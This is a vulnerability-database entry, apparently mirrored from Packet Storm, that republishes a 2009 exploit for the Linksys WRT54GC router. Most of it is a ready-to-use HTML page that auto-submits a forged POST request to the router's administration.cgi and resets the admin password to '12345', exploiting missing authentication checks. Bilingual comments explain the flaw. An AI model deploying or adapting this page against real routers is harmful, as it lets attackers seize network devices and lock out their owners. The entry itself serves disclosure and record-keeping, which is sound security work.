ID

VAR-E-200904-0719


TITLE

Linksys WRT54GC Password Changer

Trust: 0.5

sources: PACKETSTORM: 76814

DESCRIPTION

Linksys WRT54GC administration password changing exploit.

Trust: 0.5

sources: PACKETSTORM: 76814

AFFECTED PRODUCTS

vendor: linksys | model: wrt54gc | scope: - | version: -

Trust: 0.5

sources: PACKETSTORM: 76814

EXPLOIT

<!--
***************
* Gabriel Lima - gabriel@falandodeseguranca.com
* www.falandodeseguranca.com
***************

(English:)
Linksys WRT54GC - Administration Password Change
The Router WRT54GC doesn't seem to check authentication from the administrator in its .CGI files, accepting any POST request,
as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration

(Portuguese:)
Linksys WRT54GC - Password Change
The WRT54GC router does not seem to verify administrator authentication in its .CGI files, accepting any POST submission
as a password change. Below is an example form that changes the administrator password and login to 12345.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and remote administration.

Credits:
Gabriel Lima. gabriel@falandodeseguranca.com
-->

<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<!-- Automatic form submission code -->

<SCRIPT language="JavaScript">
document.senha.submit();
</SCRIPT>

</body></html>

Trust: 0.5

sources: PACKETSTORM: 76814

EXPLOIT HASH

LOCAL

SOURCE

md5: 5ab7acb79e1ecafd25b759bf0cf340f7
sha-1: de252782a30d9fad8cbbc92986f5d5671826ac14
sha-256: da074ee787a2a88af7e64dc05e241325daf3525e32fa2814ce3f2e5dd7e34aac

Trust: 0.5

sources: PACKETSTORM: 76814

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 76814

TAGS

tag:exploit

Trust: 0.5

sources: PACKETSTORM: 76814

CREDITS

Gabriel Lima

Trust: 0.5

sources: PACKETSTORM: 76814

EXTERNAL IDS

db: PACKETSTORM | id: 76814

Trust: 0.5

sources: PACKETSTORM: 76814

SOURCES

db: PACKETSTORM | id: 76814

LAST UPDATE DATE

2022-07-27T09:41:13.112000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM | id: 76814 | date: 2009-04-20T19:36:30